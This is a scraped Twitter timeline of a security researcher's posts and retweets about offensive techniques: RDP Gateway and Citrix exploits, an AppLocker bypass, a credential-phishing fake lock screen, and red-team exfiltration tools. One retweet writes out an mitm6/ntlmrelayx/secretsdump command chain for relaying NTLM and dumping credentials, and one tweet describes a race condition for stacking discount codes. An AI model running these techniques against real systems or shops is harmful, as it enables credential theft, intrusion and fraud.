Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @aceb0nd
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @aceb0nd
-
Acebond proslijedio/la je Tweet
Join me and
@CptJesus on Tuesday, February 11th as we unveil#BloodHound 3.0! We will demo new attack primitives, performance improvements, and changes in the GUI. Register for the webinar here (recording available afterwards): https://specterops.zoom.us/webinar/register/WN_Ak7pi_zxSM28HBIl5RIVWw …pic.twitter.com/pP4BxRE0tN
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
New blog post! 10 web vulnerabilities that you might not know exist and should be on the lookout for https://shellz.club/interesting-web-attacks/ … Let me know what out of the ordinary vulns you have discovered in the comments below
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Acebond proslijedio/la je Tweet
Ladies and gentlemen, I present you a working Remote Code Execution (RCE) exploit for the Remote Desktop Gateway (CVE-2020-0609 & CVE-2020-0610). Accidentally followed a few rabbit holes but got it to work! Time to write a blog post ;) Don't forget to patch!pic.twitter.com/FekupjS6qG
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Acebond proslijedio/la je Tweet
PoC (Denial-of-Service) for CVE-2020-0609 & CVE-2020-0610 Please use for research and educational purpose only. https://github.com/ollypwn/BlueGate …pic.twitter.com/R43AHUwGV0
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Acebond proslijedio/la je Tweet
Shout-out to
@_xpn_ for pointing this out in his blog on inter-realm keys:https://blog.xpnsec.com/inter-realm-key-roasting/ …Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Acebond proslijedio/la je Tweet
Revisiting RDP lateral movement https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3 … and releasing a project that will be part of a bigger tool coming next week
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Acebond proslijedio/la je Tweet
I have changed my views. Rust needs to exist. There will always be people who, for whatever reason, are bad at making choices and don’t want to code in Go. If Rust did not exist then those people would choose C++.
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Acebond proslijedio/la je Tweet
If you have AppLocker deployed, be aware that most times when Windows 10 is updated/upgraded, it creates a TASKS_MIGRATED folder under C:\windows\system32 that has the CREATOR OWNER, meaning that users can create and execute files from the folder and bypassing AppLocker
pic.twitter.com/YLUxRxDyxr
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Acebond proslijedio/la je Tweet
After
@keld_norman's nice demo I totally reworked@Mattspickford SharpLocker: - 11KB PowerShell payload - contains encoded NET assembly - tries to use correct LockScreen background and user picture - returns result to PS as String Comparison with real LockScreen:pic.twitter.com/JZHtCZXnLlPrikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Acebond proslijedio/la je Tweet
New
@OutflankNL tool coming soon... Zipper, a CobaltStrike tool written in C which allows you to compress files and folders from local and UNC paths. Useful for RedTeams when large files/folders need to be exfiltrated.pic.twitter.com/HA0ceyw6Mq
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Acebond proslijedio/la je Tweet
#CVE-2020-2551 Weblogic RCE via iiop protocol, funny bug:Dpic.twitter.com/Xv6ar3w8GxHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
and then buy
@albinowax a beer with the money you saved.Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
If a website lets you apply discount codes but limits you to one, try Burp Turbo Intruder last-byte synchronization to race condition the backend logic and apply multiple discount codes.
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Acebond proslijedio/la je Tweet
This is clever: find an unlocked Windows computer, pop in a USB and it shows a fake login/lock screen ("hmm, did I lock my PC when I went for a coffee?") User enters credentials into *your* app & you just stole the username/password.
https://github.com/Pickfordmatt/SharpLocker …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
What have I become? I've written a blog post aimed at management level employees that explains how webapp penetration tests work. https://shellz.club/how-do-penetration-tests-work/ … Hopefully someone find this useful
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Acebond proslijedio/la je Tweet
I’m calling CVE-2019-19781 Shitrix, as media won’t reuse a swear word, but I can remember it.
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Acebond proslijedio/la je Tweet
Interested in the Citrix Netscaler exploit for CVE-2019-19781?
@TrustedSec just uploaded it to Githubhttps://github.com/trustedsec/cve-2019-19781 …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Acebond proslijedio/la je Tweet
It's 2020 and you have NetBIOS, LLMNR, SMB sign off but WPAD is still on. EWW! mitm6 -i eth0 -d <domain> http://ntlmrelayx.py -t ldaps://<DomainController> -wh attacker-wpad --delegate-access export KRB5CCNAME=<TGS_ccache_file> http://secretsdump.py –k –no-pass <VictimPC>
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Acebond proslijedio/la je Tweet
nobody would ever expose, without authentication, smb.conf on a perimeter security device. Citrix: hold my appliance while I show you something... https://isc.sans.edu/forums/diary/A+Quick+Update+on+Scanning+for+CVE201919781+Citrix+ADC+Gateway+Vulnerability/25686/ …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Acebond proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.